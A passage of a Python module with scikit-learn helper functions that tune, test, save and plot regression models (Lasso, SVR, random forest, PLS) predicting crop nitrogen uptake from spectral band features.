print('Lasso:') if isinstance(model, SVR): print('Support vector regression:') if isinstance(model, RandomForestRegressor): print('Random forest:') if isinstance(model, PLSRegression): print('Partial least squares regression:') def get_lasso_feats(df_temp, key, transformer_lasso, X_select, y): ''' Because Lasso has it's own feature selection built right into the aglorithm, it may be desireable to see the actual features used by the prediction model. This function gets the features chosen from feature selection and adds them as two additional columns to the dataframe. 
''' las2_alpha = df_temp['tune_params'].values[0][f'{key}alpha'] # to figure out which bands were actually used transformer_lasso.set_params(**{f'{key}alpha': las2_alpha}) key_c = f'{key}'[:-2] transformer_lasso.get_params()[key_c].fit(X_select, y) model_bs2 = SelectFromModel(transformer_lasso.get_params()[key_c], prefit=True) feats_used = model_bs2.get_support(indices=True) df_temp['feat_n_used'] = len(feats_used) df_temp['features_used'] = [feats_used] return df_temp def tune_model(X_select, y, model, param_grid, standardize, scoring, scoring_refit, key, cv_rep_strat, feats, feat_ranking, alpha, cols): ''' Tunes a single model and appends results as a new row to df_full ''' # cols_e = cols.extend(['feat_n_used', 'features_used']) data = [len(feats), alpha] data[2:] = [np.nan] * 15 if (len(feats) == 0) or (isinstance(model, PLSRegression) and len(feats) <= 1): df_temp = pd.DataFrame(data=[data], columns=cols) else: df_tune, transformer = model_tuning( model, param_grid, standardize, scoring, scoring_refit, X_select, y, cv_rep_strat) df_temp = get_tuning_scores_multiple( feats, feat_ranking, alpha, df_tune, cols, scoring1=scoring[0], scoring2=scoring[1], scoring3=scoring[2]) if isinstance(model, Lasso) and len(feats) > 0: df_temp = get_lasso_feats(df_temp, key, transformer, X_select, y) elif isinstance(model, Lasso) and len(feats) == 0: df_temp['feat_n_used'] = len(feats) df_temp['features_used'] = [feats] return df_temp # @ignore_warnings(category=ConvergenceWarning) def execute_tuning(alpha_list, X, y, model_list, param_grid_dict, standardize, scoring, scoring_refit, max_iter, random_seed, key, df_train, n_splits, n_repeats, print_results=False): ''' Execute model tuning, saving gridsearch hyperparameters for each number of features. ''' cols = [ 'feat_n', 'alpha', 'score_train_mae', 'std_train_mae', 'score_val_mae', 'std_val_mae', 'score_train_mse', 'std_train_mse', 'score_val_mse', 'std_val_mse', 'score_train_r2', 'std_train_r2', 'score_val_r2', 'std_val_r2', 'tune_params', 'features', 'feat_ranking'] param_grid_dict_key = param_grid_add_key(param_grid_dict, key) df_tune_feat_list = (None,) * len(model_list) # alpha_list = chunks[7] for alpha in alpha_list: X_select, feats, feat_ranking = feat_selection_lasso( X, y, alpha, max_iter, random_seed) print('Number of features: {0}'.format(len(feats))) temp_list = [] for idx1, (model, param_grid) in enumerate(zip(model_list, param_grid_dict_key.values())): cv_rep_strat = get_repeated_stratified_kfold( df_train, n_splits, n_repeats, random_seed) param_grid_dc = deepcopy(param_grid) # will show a verbose warning if n_components exceeds n_feats if f'{key}n_components' in param_grid_dc: n_comp = param_grid_dc[f'{key}n_components'] if len(feats) < max(n_comp): print('Trimming excess components in <param_grid>...') n_comp_trim = [i for i in n_comp if i <= len(feats)] param_grid_dc[f'{key}n_components'] = n_comp_trim # print('n_components: {0}'.format(param_grid_dc[f'{key}n_components'])) df_tune_temp = tune_model( X_select, y, model, param_grid_dc, standardize, scoring, scoring_refit, key, cv_rep_strat, feats, feat_ranking, alpha, cols) if print_results is True: print_model(model) print('R2: {0:.3f}\n'.format(df_tune_temp['score_val_r2'].values[0])) temp_list.append(df_tune_temp) df_tune_feat_list = append_tuning_results(df_tune_feat_list, temp_list) return df_tune_feat_list # len(df_tune_feat_list[0]) # len(df_tune_feat_list[1]) # @ignore_warnings(category=ConvergenceWarning) def execute_tuning_pp( logspace_list, X1, y1, model_list, 
param_grid_dict, standardize, scoring, scoring_refit, max_iter, random_seed, key, df_train, n_splits, n_repeats, df_tune_all_list, n_jobs): ''' Actual execution of hyperparameter tuning via multi-core processing ''' # m = Manager() # lock = m.Lock() # chunks = chunk_by_n(reversed(logspace_list)) # chunk_size = int(len(logspace_list) / (n_jobs*2)) + 1 chunks = chunk_by_n(logspace_list, n_jobs*2) # remember this shuffles logspace_list if len(logspace_list) < n_jobs * 2: chunks = chunk_by_n(logspace_list, n_jobs) # print('Length of logspace_list: {0}'.format(len(logspace_list))) # print('Number of chunks: {0}'.format(len(chunks))) chunk_avg = sum([len(i) for i in chunks]) / len(chunks) # print('Average length of each chunk: {0:.1f}'.format(chunk_avg)) # print('Number of cores: {0}\n'.format(n_jobs)) with ProcessPoolExecutor(max_workers=n_jobs) as executor: # for alpha, df_tune_feat_list in zip(reversed(logspace_list), executor.map(execute_tuning, it.repeat(X1), it.repeat(y1), it.repeat(model_list), it.repeat(param_grid_dict), reversed(logspace_list), # it.repeat(standardize), it.repeat(scoring), it.repeat(scoring_refit), it.repeat(max_iter), it.repeat(random_seed), # it.repeat(key), it.repeat(df_train), it.repeat(n_splits), it.repeat(n_repeats))): for df_tune_feat_list in executor.map(execute_tuning, chunks, it.repeat(X1), it.repeat(y1), it.repeat(model_list), it.repeat(param_grid_dict), it.repeat(standardize), it.repeat(scoring), it.repeat(scoring_refit), it.repeat(max_iter), it.repeat(random_seed), it.repeat(key), it.repeat(df_train), it.repeat(n_splits), it.repeat(n_repeats)): # chunksize=chunk_size)) # print('type: {0}'.format(type(df_tune_feat_list[0]))) # print('len: {0}'.format(len(df_tune_feat_list))) # print('Len: {0}'.format(len(df_tune_all_list))) # with lock: df_tune_all_list = append_tuning_results(df_tune_all_list, df_tune_feat_list) return df_tune_all_list # chunk_size = int(len(logspace_list) / (os.cpu_count()*2)) # chunks = [logspace_list[x:x+chunk_size] for x in range(0, len(logspace_list), chunk_size)] # with ProcessPoolExecutor() as executor: # array = [(X1, y1, model_list, param_grid_dict, alpha, standardize, # scoring, scoring_refit, max_iter, random_seed, key, df_train, # n_splits, n_repeats) # for alpha in reversed(logspace_list)] # # executor.map(execute_tuning, *zip(*array)) # for alpha, df_tune_feat_list in zip( # reversed(logspace_list), # executor.map(execute_tuning, *zip(*array))): # # print('Alpha: {0}\nResult: {1}\n'.format(alpha, df_tune_feat_list)) # df_tune_all_list = append_tuning_results( # df_tune_all_list, df_tune_feat_list) # return df_tune_all_list def filter_tuning_results(df_tune_all_list, score): ''' Remove dupilate number of features (keep only lowest error) ''' df_tune_list = () for df_tune in df_tune_all_list: df_tune = df_tune.reset_index(drop=True) array_idx = df_tune.groupby(['feat_n'])[score].transform(max) == df_tune[score] # if first non-zero feat_n row is NaN, include that so other dfs have same number of rows (PLS) if np.isnan(df_tune.loc[df_tune['feat_n'].idxmin(),score]): array_idx.loc[df_tune['feat_n'].idxmin()] = True df_tune['feat_n'] = df_tune['feat_n'].apply(pd.to_numeric) df_filtered = df_tune[array_idx].drop_duplicates(['feat_n']).sort_values('feat_n').reset_index(drop=True) df_tune_list += (df_filtered,) return df_tune_list def summarize_tuning_results(df_tune_list, model_list, param_grid_dict, key=''): ''' Summarizes the hyperparameters from the tuning process into a single dataframe ''' cols_params = ['feat_n'] for k1, v1 in 
param_grid_dict.items(): for k2, v2 in param_grid_dict[k1].items(): k2_short = k2.replace(key, '') cols_params.append(k1 + '_' + k2_short) df_params = pd.DataFrame(columns=cols_params) # for each feature (if missing just put nan) feat_max = max([df['feat_n'].max() for df in df_tune_list]) for feat_n in range(1,feat_max+1): data_dict = {i: np.nan for i in cols_params} data_dict['feat_n'] = [feat_n] for idx_df, df_original in enumerate(df_tune_list): df = df_original.copy() df.set_index('feat_n', inplace=True) if isinstance(model_list[idx_df], Lasso) and feat_n in df.index: las_params = df.loc[feat_n]['tune_params'] try: las_alpha = las_params[f'{key}alpha'] except TypeError: # when cell is nan instead of dict continue # go to next index where there is actually data data_dict['las_alpha'] = [las_alpha] elif isinstance(model_list[idx_df], SVR) and feat_n in df.index: svr_params = df.loc[feat_n]['tune_params'] svr_kernel = svr_params[f'{key}kernel'] try: svr_gamma = svr_params[f'{key}gamma'] except KeyError: svr_gamma = np.nan svr_C = svr_params[f'{key}C'] svr_epsilon = svr_params[f'{key}epsilon'] data_dict['svr_kernel'] = [svr_kernel] data_dict['svr_gamma'] = [svr_gamma] data_dict['svr_C'] = [svr_C] data_dict['svr_epsilon'] = [svr_epsilon] elif isinstance(model_list[idx_df], RandomForestRegressor) and feat_n in df.index: rf_params = df.loc[feat_n]['tune_params'] rf_min_samples_split = rf_params[f'{key}min_samples_split'] rf_max_feats = rf_params[f'{key}max_features'] data_dict['rf_min_samples_split'] = [rf_min_samples_split] data_dict['rf_max_feats'] = [rf_max_feats] elif isinstance(model_list[idx_df], PLSRegression) and feat_n in df.index: # The model shouldn't even be in model_list if there is no information for it. # This was changed when the PLS component list was modified to cut out # components that are greater than number of features (e.g., we can't # tune on 8 components with 4 features). # Thus, assume the "garbage" was filtered out already and we will only # arrive here if 'tune_params' exists. 
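                # Even so, 'tune_params' can still be NaN for a PLS row
                # (hence the pd.notnull() guard below), in which case NaN
                # placeholders are recorded for n_components and scale.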
pls_params = df.loc[feat_n]['tune_params'] if pd.notnull(pls_params): pls_n_components = pls_params[f'{key}n_components'] pls_scale = pls_params[f'{key}scale'] else: pls_n_components = np.nan pls_scale = np.nan data_dict['pls_n_components'] = [pls_n_components] data_dict['pls_scale'] = [pls_scale] df_summary_row = pd.DataFrame.from_dict(data=data_dict) df_params = df_params.append(df_summary_row) return df_params.reset_index(drop=True) def append_tuning_results(df_tune_all_list, df_tune_feat_list): ''' Appends tune_feat to tune_all as a list/tuple ''' msg = ('<df_tune_all_list> and <df_tune_feat_list> must be the same ' 'length.') assert len(df_tune_all_list) == len(df_tune_feat_list), msg df_out_list = () for df_all, df_single in zip(df_tune_all_list, df_tune_feat_list): if df_all is None and df_single is not None: df_all = df_single.copy() elif df_all is not None and df_single is not None: df_all = df_all.append(df_single) else: pass df_out_list += (df_all,) return df_out_list def tuning_mode_count(df_params, svr_only=False): ''' Calculates the mode and count of the most popular ``svr_only`` needs work ''' cols_params = list(df_params.columns) if 'feat_n' in cols_params: cols_params.remove('feat_n') if svr_only is True: kernel_mode = df_params['svr_kernel'].mode().values[0] df_params_mode = df_params[df_params['svr_kernel'] == kernel_mode][cols_params].mode() n_obs = len(df_params[df_params['svr_kernel'] == kernel_mode][cols_params]) else: df_params_mode = df_params[cols_params].mode() n_obs = len(df_params[cols_params]) data = [] for col_name in df_params_mode.columns: val_count = df_params_mode.loc[0][col_name] try: count = df_params[col_name].value_counts()[val_count] except TypeError: count = df_params[col_name].value_counts()[int(val_count)] except KeyError: count = np.nan data.append(count/n_obs) df_params_mode_count = pd.DataFrame(data=[data], columns=df_params_mode.columns) return df_params_mode, df_params_mode_count def feats_readme(fname_feats_readme, fname_data, meta_bands, extra_feats=None): ''' Describes the features being used from df_join to tune and train the models. Parameters: dir_feats (``str``): The directory to create the README.txt file bands (``dict``): Dictionary containing band number (keys) and center wavelength (values). ''' with open(os.path.join(fname_feats_readme), 'w+') as f: f.write('Features available for tuning:\n\n') f.write('Feature number: Wavelength (for spectral and derivative ' 'features only)\n' 'Any "extra" features are described by the column name from ' 'their input data source\n') f.write('Training data is saved at:\n') f.write('{0}\n'.format(fname_data)) for k, v in sorted(meta_bands.items()): # print("{0}: {1}\n".format(k, v)) f.write('{0}: {1}\n'.format(k, v)) n = max(meta_bands) if isinstance(extra_feats, str): n += 1 f.write('{0}: {1}\n'.format(n, extra_feats)) elif isinstance(extra_feats, list): for ef in extra_feats: n += 1 f.write('{0}: {1}\n'.format(n, ef)) def save_tuning_results( dir_out_tune, df_tune_list, model_list, df_params, df_params_mode, df_params_mode_count, meta_bands, fname_base='msi_00_000_measurement_units'): ''' Saves all tuning results to ``dir_out_tune`` Parameters: fname_base (``str``): the beginning of the final file names to be saved. Other information will be appended to this string to desribe predictions/scoring, as well as the model being used. 
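    For example (hypothetical base name), fname_base='msi_4_012_nup_kgha'
    produces 'msi_4_012_nup_kgha-tuning-lasso.csv' (one file per model),
    plus the '-tuning-summary.csv', '-tuning-mode.csv', and
    '-tuning-mode-count.csv' files.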
    '''
    tune_str = '-tuning-'
    for idx, model in enumerate(model_list):
        df = df_tune_list[idx]
        if isinstance(model, Lasso):
            model_str = 'lasso'
        elif isinstance(model, SVR):
            model_str = 'svr'
        elif isinstance(model, RandomForestRegressor):
            model_str = 'rf'
        elif isinstance(model, PLSRegression):
            model_str = 'pls'
        fname_model = os.path.join(
            dir_out_tune, fname_base + tune_str + model_str + '.csv')
        df.to_csv(fname_model, index=False)
    fname_tuning1 = os.path.join(dir_out_tune, fname_base + tune_str + 'summary.csv')
    df_params.to_csv(fname_tuning1, index=False)
    fname_tuning2 = os.path.join(dir_out_tune, fname_base + tune_str + 'mode.csv')
    df_params_mode.to_csv(fname_tuning2, index=False)
    fname_tuning3 = os.path.join(dir_out_tune, fname_base + tune_str + 'mode-count.csv')
    df_params_mode_count.to_csv(fname_tuning3, index=False)

def load_tuning_results(dir_out_tune, model_list,
                        fname_base='msi_00_000_measurement_units'):
    tune_str = '-tuning-'
    df_tune_list = []
    for model in model_list:
        if isinstance(model, Lasso):
            model_str = 'lasso'
        elif isinstance(model, SVR):
            model_str = 'svr'
        elif isinstance(model, RandomForestRegressor):
            model_str = 'rf'
        elif isinstance(model, PLSRegression):
            model_str = 'pls'
        fname_model = os.path.join(
            dir_out_tune, fname_base + tune_str + model_str + '.csv')
        df_tune_list.append(pd.read_csv(fname_model))
    fname_params = os.path.join(
        dir_out_tune, fname_base + tune_str + 'summary.csv')
    df_params = pd.read_csv(fname_params)
    fname_mode = os.path.join(
        dir_out_tune, fname_base + tune_str + 'mode.csv')
    df_params_mode = pd.read_csv(fname_mode)
    fname_count = os.path.join(
        dir_out_tune, fname_base + tune_str + 'mode-count.csv')
    df_params_mode_count = pd.read_csv(fname_count)
    return df_tune_list, df_params, df_params_mode, df_params_mode_count

# In[Model testing functions]
def get_errors(model, X, y):
    '''
    Returns the predictions along with the MAE, RMSE, and R2 for a fit model
    '''
    y_pred = model.predict(X)
    mae = mean_absolute_error(y, y_pred)
    rmse = np.sqrt(mean_squared_error(y, y_pred))
    r2 = r2_score(y, y_pred)
    return y_pred, mae, rmse, r2

def prep_pred_dfs(df_test, feat_n_list, y_label='nup_kgha'):
    cols_scores = ['feat_n', 'feats', 'score_train_mae', 'score_test_mae',
                   'score_train_rmse', 'score_test_rmse', 'score_train_r2',
                   'score_test_r2']
    cols_meta = ['study', 'date', 'plot_id', 'trt', 'rate_n_pp_kgha',
                 'rate_n_sd_plan_kgha', 'rate_n_total_kgha', 'growth_stage',
                 y_label]
    cols_preds = cols_meta + feat_n_list
    df_pred = pd.DataFrame(columns=cols_preds)
    df_pred[cols_meta] = df_test[cols_meta]
    df_score = pd.DataFrame(columns=cols_scores)
    return df_pred, df_score

def get_params(params, idx=None, col='tune_params'):
    '''
    Retrieves the dictionary of parameters to use for model training;
    ``params`` can be either a pd.DataFrame or a dict; if a dict, a copy of
    itself is returned
    '''
    if isinstance(params, pd.DataFrame):
        assert idx is not None, ('"idx" must be defined')
        try:
            params_dict = literal_eval(params.iloc[idx][col])
        except ValueError:
            params_dict = params.iloc[idx][col]
    elif isinstance(params, dict):
        params_dict = params.copy()
    else:
        params_dict = None
    return params_dict

def get_params_row(row, col='tune_params'):
    '''
    Retrieves the dictionary of parameters to use for model training;
    ``row`` can be either a pd.Series (single row of a pd.DataFrame) or a
    dict; if a dict, a copy of itself is returned
    '''
    if isinstance(row, pd.Series):
        try:
            params_dict = literal_eval(row[col])
        except ValueError:
            params_dict = row[col]
    elif isinstance(row, dict):
        params_dict = row.copy()
    else:
        params_dict = None
    return params_dict

def get_params_all(params_las, params_svr, params_rf, params_pls, idx=None,
                   col='tune_params'):
    '''
    Retrieves parameters for all models
    '''
    params_las_dict = get_params(params_las, idx=idx, col=col)
    params_svr_dict = get_params(params_svr, idx=idx, col=col)
    params_rf_dict = get_params(params_rf, idx=idx, col=col)
    params_pls_dict = get_params(params_pls, idx=idx, col=col)
    return params_las_dict, params_svr_dict, params_rf_dict, params_pls_dict

def get_feats_int(row, y_col='features', idx=False):
    '''
    Returns a list of integers that represent band numbers
    '''
    try:
        feats = row[y_col].strip('[]').split(' ')
        feats_int = []
        for item in feats:
            if item == '':
                pass
            elif '\n' in item:
                item = item.replace('\n', '')
                feats_int.append(int(item))
            else:
                feats_int.append(int(item))
    except AttributeError:
        feats_int = list(row['features'])
    return feats_int

def check_for_multiple(model, df):
    '''
    Checks if ``model`` and ``df`` are lists; if so, multiple models must be
    tested.

    Returns ``model`` and ``df`` as lists. If ``model`` was input as a single
    model, it is returned as a list with length equal to one.
    '''
    msg1 = ('If passing multiple models, ``model`` and ``df`` must both be '
            'lists and must have equal lengths.')
    if isinstance(model, list):
        assert isinstance(df, list), msg1
        assert len(model) == len(df), msg1
        model_list = model  # already lists; pass them through as-is
        df_list = df
    else:
        model_list = [model]
        df_list = [df]
    return model_list, df_list

def predict_me(model, params_dict, standardize, X1_select, y1, X1_test_select,
               y1_test, feats_int, df_pred, df_score):
    '''
    Uses params_dict to set up the model, train, test, and report error
    '''
    if isinstance(params_dict, dict):
        transformed_model = TransformedTargetRegressor(
            regressor=model, transformer=PowerTransformer(
                'yeo-johnson', standardize=standardize))
        transformed_model.set_params(**params_dict)
        transformed_model.fit(X1_select, y1)
        _, train_mae, train_rmse, train_r2 = get_errors(
            transformed_model, X1_select, y1)
        y_pred, test_mae, test_rmse, test_r2 = get_errors(
            transformed_model, X1_test_select, y1_test)
        data = [len(feats_int), feats_int, train_mae, test_mae, train_rmse,
                test_rmse, train_r2, test_r2]
    elif isinstance(model, PLSRegression) and pd.isnull(params_dict):
        # PLS requires at least two features; just record NaN for this row
        data = [len(feats_int), feats_int]
        data.extend([np.nan] * 6)
        y_pred = [np.nan] * len(df_pred)
    # any other combination is unexpected and would raise a NameError below
    df_temp_scores = pd.DataFrame(data=[data], columns=df_score.columns)
    df_score = df_score.append(df_temp_scores)  # note: DataFrame.append requires pandas < 2.0
    df_pred[len(feats_int)] = y_pred
    return df_pred, df_score

def test_predictions(df_test, X1, y1, X1_test, y1_test, model_list,
                     df_tune_list, feat_n_list, y_label='nup_kgha',
                     max_iter=5000, standardize=False, key='',
                     n_feats_linspace=50):
    '''
    Predicts ``y1_test`` for one or many models.

    model_list (``sklearn`` model or list of them): The model(s) to be used
        to make predictions. Can be a list of models to test multiple models,
        but ``df_tune_list`` must then also be a list of equal length, with
        the tuning hyperparameters corresponding to each model.
    df_tune_list (``pandas.DataFrame`` or list of them): Dataframe(s)
        containing the tuning hyperparameters to use for model testing; if a
        list, its length must match ``model_list``.
''' df_pred, df_score = prep_pred_dfs( df_test, feat_n_list, y_label=y_label) df_pred_list = () df_score_list = () for i in range(len(model_list)): # df_pred_list.append(df_pred.copy()) # df_score_list.append(df_score.copy()) df_pred_list += (df_pred.copy(),) df_score_list += (df_score.copy(),) # for idx_tune, row1 in df_tune_list[0].iterrows(): # must be sure 'features' exists in all dfs # if idx_tune == 0: # break # feats_int = get_feats_int(row, y_col='features') # X1_select = X1[:, feats_int] # X1_test_select = X1_test[:, feats_int] # for idx_model, model in enumerate(model_list): # df_tune = df_tune_list[idx_model] # df_pred = df_pred_list[idx_model] # df_score = df_score_list[idx_model] # feats_int = get_feats_int(row, y_col='features') # X1_select = X1[:, feats_int] # X1_test_select = X1_test[:, feats_int] # params_dict = get_params(df_tune, idx=idx_tune) for feat_n in df_tune_list[0]['feat_n']: # if feat_n == 1: # break for idx_model, model in enumerate(model_list): df_tune = df_tune_list[idx_model] df_pred = df_pred_list[idx_model] df_score = df_score_list[idx_model] row = df_tune[df_tune['feat_n'] == feat_n] # print(row) if len(row) == 0: continue row = row.squeeze() # changes row from pd.Dataframe to pd.Series if pd.isnull(row.score_train_mae): # not sure why, but sometimes row is len == 0, and sometimes it is len == 1 with all null continue feats_int = get_feats_int(row, y_col='features') X1_select = X1[:, feats_int] X1_test_select = X1_test[:, feats_int] # params_dict = get_params(df_tune, idx=idx_tune) # print(model) # print(row) params_dict = get_params_row(row) if (isinstance(model, PLSRegression) and isinstance(params_dict, dict) and params_dict[f'{key}n_components'] > len(feats_int)): params_dict[f'{key}n_components'] = len(feats_int) df_pred, df_score = predict_me( model, params_dict, standardize, X1_select, y1, X1_test_select, y1_test, feats_int, df_pred, df_score) # df_pred_list[idx_model] = df_pred # df_score_list[idx_model] = df_score df_pred_list = df_pred_list[:idx_model] + (df_pred,) + df_pred_list[idx_model+1:] df_score_list = df_score_list[:idx_model] + (df_score,) + df_score_list[idx_model+1:] # model, df_tune, params_dict, standardize, X1_select, y1, # X1_test_select, y1_test, feats_int, df_pred, df_score) for idx_model, model in enumerate(model_list): df_score = df_score_list[idx_model] new_index = pd.Index(range(1,n_feats_linspace+1), name='feat_n') df_score = df_score.set_index('feat_n').reindex(new_index).reset_index() # df_score_list[idx_model] = df_score df_score_list = df_score_list[:idx_model] + (df_score,) + df_score_list[idx_model+1:] return df_pred_list, df_score_list def set_up_output_dir(dir_results, msi_run_id, grid_idx, y_label, feat_name, test_or_tune='tuning'): ''' Ensures all folder directories are created, then returns each directory level for easy access for reading and writing of files for a given ``msi_run_id``, ``grid_idx``, ``y_label``, and ``feat_name``. 
test_or_tune (``str``): Should be either 'tuning' or 'testing' ''' folder_msi = 'msi_' + str(msi_run_id) + '_' + str(grid_idx).zfill(3) dir_out0 = os.path.join(dir_results, folder_msi) # folder 1 # if not os.path.isdir(dir_out0): # pathlib.Path(dir_out0).mkdir(parents=True, exist_ok=True) dir_out1 = os.path.join(dir_out0, y_label) # folder 2 # if not os.path.isdir(dir_out1): # pathlib.Path(dir_out1).mkdir(parents=True, exist_ok=True) dir_out2 = os.path.join(dir_out1, feat_name) # folder 3 # if not os.path.isdir(dir_out2): # pathlib.Path(dir_out2).mkdir(parents=True, exist_ok=True) dir_out3 = os.path.join(dir_results, folder_msi, y_label, feat_name, test_or_tune) # folder 4 # if not os.path.isdir(dir_out3): pathlib.Path(dir_out3).mkdir(parents=True, exist_ok=True) if test_or_tune == 'testing': # if not os.path.isdir(os.path.join(dir_out3, 'figures')): pathlib.Path(os.path.join(dir_out3, 'figures')).mkdir(parents=True, exist_ok=True) return [dir_out0, dir_out1, dir_out2, dir_out3], [folder_msi, y_label, feat_name, test_or_tune] def set_up_summary_files(dir_out, y_label, n_feats, msi_run_id): ''' meta_info = [msi_run_id, grid_idx, y_label, extra_feats] ''' cols = ['msi_run_id', 'grid_idx', 'response_label', 'extra_feats', 'model_name'] feat_list = list(range(1,50+1)) cols.extend(feat_list) msi_str = 'msi_' + str(msi_run_id) + '_' fname_sum_mae = os.path.join(dir_out, msi_str + '_'.join((y_label, 'MAE')) + '.csv') fname_sum_rmse = os.path.join(dir_out, msi_str + '_'.join((y_label, 'RMSE')) + '.csv') fname_sum_r2 = os.path.join(dir_out, msi_str + '_'.join((y_label, 'R2')) + '.csv') if not os.path.isfile(fname_sum_mae): df_sum_mae = pd.DataFrame(columns=cols) df_sum_mae.to_csv(fname_sum_mae, index=False) if not os.path.isfile(fname_sum_rmse): df_sum_rmse = pd.DataFrame(columns=cols) df_sum_rmse.to_csv(fname_sum_rmse, index=False) if not os.path.isfile(fname_sum_r2): df_sum_r2 = pd.DataFrame(columns=cols) df_sum_r2.to_csv(fname_sum_r2, index=False) def append_test_scores(dir_out, y_label, df_score_list, model_list, metadata): ''' metadata = [msi_run_id, row.name, y_label, extra_feats] ''' cols = ['msi_run_id', 'grid_idx', 'response_label', 'extra_feats', 'model_name'] msi_str = 'msi_' + str(metadata[0]) + '_' fname_sum_mae = os.path.join(dir_out, msi_str + '_'.join((y_label, 'MAE')) + '.csv') fname_sum_rmse = os.path.join(dir_out, msi_str + '_'.join((y_label, 'RMSE')) + '.csv') fname_sum_r2 = os.path.join(dir_out, msi_str + '_'.join((y_label, 'R2')) + '.csv') for idx_model, model in enumerate(model_list): meta = metadata + [str(model).split('(')[0]] # metadata.append(str(model).split('(')[0]) s_metadata = pd.Series(meta, index=cols) df_score = df_score_list[idx_model] df_score.set_index('feat_n') s_score_mae = s_metadata.append(df_score['score_test_mae'].transpose()) s_score_rmse = s_metadata.append(df_score['score_test_rmse'].transpose()) s_score_r2 = s_metadata.append(df_score['score_test_r2'].transpose()) df_score_mae = pd.DataFrame(s_score_mae).T df_score_rmse = pd.DataFrame(s_score_rmse).T df_score_r2 = pd.DataFrame(s_score_r2).T df_score_mae.to_csv(fname_sum_mae, header=None, mode='a', index=False, index_label=df_score_mae.columns) df_score_rmse.to_csv(fname_sum_rmse, header=None, mode='a', index=False, index_label=df_score_rmse.columns) df_score_r2.to_csv(fname_sum_r2, header=None, mode='a', index=False, index_label=df_score_r2.columns) def save_test_results(dir_out_test, df_pred_list, df_score_list, model_list, fname_base='msi_00_000_measurement_units'): ''' Parameters: fname_base 
(``str``): the beginning of the final file names to be saved. Other information will be appended to this string to desribe predictions/scoring, as well as the model being used. ''' pred_str = '_test-preds-' score_str = '_test-scores-' for idx, model in enumerate(model_list): df_pred = df_pred_list[idx] df_score = df_score_list[idx] if isinstance(model, Lasso): model_str = 'lasso' elif isinstance(model, SVR): model_str = 'svr' elif isinstance(model, RandomForestRegressor): model_str = 'rf' elif isinstance(model, PLSRegression): model_str = 'pls' fname_pred = os.path.join( dir_out_test, fname_base + pred_str + model_str + '.csv') fname_score = os.path.join( dir_out_test, fname_base + score_str + model_str + '.csv') df_pred.to_csv(fname_pred, index=False) df_score.to_csv(fname_score, index=False) def load_test_results(dir_out_test, model_list, fname_base='msi_00_000_measurement_units'): ''' Loads all testing results from ``dir_out_test`` ''' pred_str = '_test-preds-' score_str = '_test-scores-' df_pred_list = () df_score_list = () for idx, model in enumerate(model_list): if isinstance(model, Lasso): model_str = 'lasso' elif isinstance(model, SVR): model_str = 'svr' elif isinstance(model, RandomForestRegressor): model_str = 'rf' elif isinstance(model, PLSRegression): model_str = 'pls' fname_pred = os.path.join( dir_out_test, fname_base + pred_str + model_str + '.csv') fname_score = os.path.join( dir_out_test, fname_base + score_str + model_str + '.csv') # df_pred_list.append(pd.read_csv(fname_pred)) # df_score_list.append(pd.read_csv(fname_score)) df_pred_list += (pd.read_csv(fname_pred),) df_score_list += (pd.read_csv(fname_score),) return df_pred_list, df_score_list # In[Plotting functions] def calc_r2(s_x, s_y, print_out=False): s_x = s_x.values s_y = s_y.values reg1 = LinearRegression().fit(s_x.reshape(-1,1), s_y.reshape(-1,1)) r_2 = reg1.score(s_x.reshape(-1,1), s_y.reshape(-1,1)) y_pred = reg1.predict(s_x[:, np.newaxis]) rmse = np.sqrt(mean_squared_error(s_y, y_pred)) x_lin = np.linspace(s_x.min()-s_x.min()*0.1, s_x.max()+s_x.max()*0.1, num=20) y_lin = reg1.predict(x_lin[:, np.newaxis]) if print_out is True: print(r'R^2 = {0:.3f}'.format(r_2)) print(r'RMSE = {0:.1f}'.format(rmse)) return r_2, rmse, x_lin, y_lin def _annotate_arrow(ax, str_r2, x_arrow, y_arrow, xytext=(0.05, 0.83), ha='left', va='top', fontsize=16, color='#464646'): boxstyle_str = 'round, pad=0.5, rounding_size=0.15' ax.annotate( str_r2, xy=(x_arrow, y_arrow), xytext=xytext, # loc to place text textcoords='axes fraction', # placed relative to axes ha=ha, va=va, fontsize=fontsize, color=color, bbox=dict(boxstyle=boxstyle_str, pad=0.5, fc=(1, 1, 1), ec=(0.5, 0.5, 0.5), alpha=0.7), arrowprops=dict(arrowstyle='-|>', color=color, # patchB=el, shrinkA=0, shrinkB=0, connectionstyle='arc3,rad=-0.2', alpha=0.4)) def best_fit_line(df, x_col, y_col, ax, fontsize=16, linecolor='#464646', fontcolor='#464646', xytext=(0.95, 0.05), ha='right', va='bottom'): # df = df_preds_las.copy() r_2, rmse, x_lin, y_lin = calc_r2(df[x_col], df[y_col]) lin_r2_las = ax.plot(x_lin, y_lin, color=linecolor, alpha=0.6, linestyle='-') str_r2 = r'Best-fit line' + '\n' + 'R$^{2}$' str_r2_las = '{0} = {1:.3f}'.format(str_r2, r_2) _annotate_arrow(ax, str_r2_las, x_lin[15], y_lin[15], xytext=xytext, ha=ha, va=va, fontsize=fontsize, color=fontcolor) def prediction_error_label(df_scores, feat_n, ax, fontsize, fontcolor, xy=(0.05, 0.1), ha='left', va='top', hsanalyze=None, units=None): score_row = df_scores[df_scores['feat_n'] == int(feat_n)] if hsanalyze is not 
None: try: # works when just finished training the model band_nums = hsanalyze.io.tools.get_band_num(score_row['feats'].values[0]) except TypeError: # works when loading in data from a previous run band_nums = hsanalyze.io.tools.get_band_num(literal_eval(score_row['feats'].values[0])) wl_list = [] for band in band_nums: wl = hsanalyze.io.tools.get_wavelength(band) wl_list.append(wl) print('The following features were used: {0}'.format(wl_list)) if units is None: units = '' mae = score_row['score_test_mae'].values[0] rmse = score_row['score_test_rmse'].values[0] str_err = ('Prediction error\nMAE = {0:.2f}{2}\nRMSE = {1:.2f}{2}' ''.format(mae, rmse, units)) boxstyle_str = 'round, pad=0.5, rounding_size=0.15' ax.annotate( str_err, xy=xy, xycoords='axes fraction', ha=ha, va=va, fontsize=fontsize, color=fontcolor, bbox=dict(boxstyle=boxstyle_str, pad=0.5, fc=(1, 1, 1), ec=(0.5, 0.5, 0.5), alpha=0.7)) def stratified_error(df_pred, y_col, feat_n, ax, levels=[25, 50, 100], fontsize=16, fontcolor='#464646', linecolor='#464646', alpha=0.7): font_scale = 16/fontsize last_level = 0 for idx in range(len(levels) + 1): try: level = levels[idx] except IndexError: pass if idx == 0: df_preds = df_pred[df_pred[y_col] < level] elif idx == len(levels) - 1: df_preds = df_pred[df_pred[y_col] >= last_level] else: df_preds = df_pred[(df_pred[y_col] >= last_level) & (df_pred[y_col] < level)] y_pos = np.mean([level, last_level]) print(len(df_preds)) mae = mean_absolute_error(df_preds[y_col], df_preds[feat_n]) 